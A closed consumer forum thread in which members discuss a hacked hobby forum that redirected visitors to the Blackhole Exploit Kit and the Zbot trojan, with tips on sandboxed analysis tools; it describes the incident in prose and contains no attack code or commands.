We'd like to remind Forumites to please avoid political debate on the Forum... Read More »
We're aware that some users are experiencing technical issues which the team are working to resolve. See the Community Noticeboard for more info. Thank you for your patience.
📨 Have you signed up to the Forum's new Email Digest yet? Get a selection of trending threads sent straight to your inbox daily, weekly or monthly!
help with a trojan
Options
Comments
-
You could e-mail and explain you cannot get the site, ask if he will e-mail you when the site is repaired
DavidWGordon@verizon.net
Nothing stops me going there with 3 browsers?0 -
Trying to visit the site using Opera gives a malware site warning, due to:
http://www.avgthreatlabs.com/sitereports/domain/abeforum.com0 -
Bit odd that only one of four browsers sees anything wrong, clicked ignore this warning and it went to the site, the anti virus didn't pop up, nor did the real time malware scanner, though am running full scans now0
-
its the ads on the site sometimes can cause the avast to go loopyReplies to posts are always welcome, If I have made a mistake in the post, I am human, tell me nicely and it will be corrected. If your reply cannot be nice, has an underlying issue, or you believe that you are God, please post in another forum. Thank you0
-
Seems like it's being cleaned up...The Abe Forum will likely be down until sometime during the day on Thursday, the 29th at the soonest (US, East Coast time). I am working with support on our forum software to get the reply function back, and with another firm to take care of the alerts that some of us were getting. I expect this will all be cleared up soon, but until then, come check out The Abe Forum on Facebook.0
-
It's back online.
The problems started with them not using up to date forum software. This was able to be hacked and a malicious javascript inserted.
This obfuscated javascript silently redirected visitors to a .php script hosted on another site (feedurbrain.com). The last time I looked, the .php script was 404'ing for me. Which is probably why when some of you visited, although Avast warned about the Javascript (JS:Redirector) - nothing more happened.
By the looks of things the .php script made a further redirection to a domain hosting the Blackhole Exploit kit. From there a number of exploit attempts are made against - amongst others - Windows itself, Browsers (IE & Firefox), Adobe products (Flash, Reader), Java Runtime etc. Should a vulnerability be found, then malware would have been downloaded and executed on your computer.
In my case an attempt to exploit the (patched) vulnerability in Help and Support Center (MS10-042) enabled me to get the file.
The file I managed to get hold of initially was later confirmed by Microsoft to be PWS:win32/Zbot
https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=8ef2b52b-1363-44e2-b526-cdc2ab6d69a1&n=1
Note the VirusTotal report (post #3) - Only 5 Anti-viruses were able to detect in initially - Almost none of the more popular AV's detected it at first.PWS:Win32/Zbot is a password-stealing trojan that monitors for visits to certain Web sites. It allows limited backdoor access and control and may terminate certain security-related processes.
It wasn't only the Abe Forum affected. Others were affected too.
Looking around, I'm dismayed by the number of people that ignored the warnings and attempted to visit the site, and those who actually turned off their security to visit the site - despite the warnings - because it wouldnt let them visit at all.
No wonder people get infected.
0 -
Perhaps the others who visited the site also knew what they were doing.0
-
There are ways to test suspected sites without directly accessing them with a browser, e.g. a service like Wepawet:
http://wepawet.iseclab.org/
The advantage of this service is that it'll show exactly what outbound URLs are produced from the script, without us having to deobfuscate anything ourselves. OTOH it doesn't always correctly label a link as malicious when it in fact is (sometimes if the site can't be accessed for some reason), so you need to know what you're looking for. After awhile it's easy to guess exactly what exploit it's linking to, as the URLs hidden in the obfuscated script tend to be written uniformly, e.g. "example.com/index.php?tp=001245676ea" is pretty much going to be a Blackhole Exploit Kit.
Or to look at the code directly with Malzilla, which has tools to deobfuscate the script:
http://malzilla.sourceforge.net/
I'm fairly confident that both Santer and Dogmary would have been using sandboxie with appropriate restrictions when accessing the sites though.
For some reason I see a lot of Blackhole Exploit Kits on infected UK sites, usually for local businesses. Probably as Waddler suggested for this one, poorly maintained sites using older (exploitable) software.0 -
I have this as well, if something were to get on then threatfire stops it doing anything, that's the theory
http://www.threatfire.com/
When it does pop up for something, I leave the box unticked for remember the option, just in case a programme with access wants to use it for any other reason0 -
Looking around, I'm dismayed by the number of people that ignored the warnings...
Perhaps the others who visited the site also knew what they were doing.
I'm fairly confident that both Santer and Dogmary would have been using sandboxie with appropriate restrictions when accessing the sites though.
I was referring more to the members of the affected forums than anyone on here. From the comments some obviously didn't know what they were doing and ended up infected because of it.
It doesn't help when the site admins don't know what's going on. The Abe Forums admin "There is no threat to anyone's computer. The forum is only text and pictures." suggests he didn't have a clue or didn't want to admit it - that helps no-one.0
This discussion has been closed.
Confirm your email address to Create Threads and Reply
Categories
- All Categories
- 350.8K Banking & Borrowing
- 253.1K Reduce Debt & Boost Income
- 453.5K Spending & Discounts
- 243.8K Work, Benefits & Business
- 598.7K Mortgages, Homes & Bills
- 176.8K Life & Family
- 257.1K Travel & Transport
- 1.5M Hobbies & Leisure
- 16.1K Discuss & Feedback
- 37.6K Read-Only Boards